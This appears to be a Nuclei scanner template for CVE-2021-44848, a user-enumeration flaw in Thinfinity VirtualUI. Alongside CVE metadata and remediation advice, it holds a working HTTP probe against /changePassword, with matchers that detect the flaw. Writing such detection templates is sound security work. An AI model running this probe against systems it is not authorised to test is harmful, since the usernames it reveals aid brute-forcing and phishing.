id: CVE-2021-44848 info: name: Thinfinity VirtualUI User Enumeration author: danielmofer severity: medium description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) impact: | An attacker can use the gathered usernames for further attacks, such as brute-forcing passwords or launching targeted phishing campaigns. remediation: | Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability. reference: - https://github.com/cybelesoft/virtualui/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 - https://www.tenable.com/cve/CVE-2021-44848 - http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-44848 cwe-id: CWE-203 epss-score: 0.01603 epss-percentile: 0.86023 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cybelesoft product: thinfinity_virtualui tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft http: - raw: - | GET /changePassword?username=administrator HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - '"rc":(.*?)' - '"msg":"(.*?)"' condition: and - type: status status: - 200 # digest: 490a0046304402202950db440b422f26ab65f40c0674080dd404e3834d3e5f9c561eb62a11b54f68022066835f784448973dbe893b1a54950d23178493e8525558fd62fd2548facbbc62:922c64590222798bb761d5b6d8e72950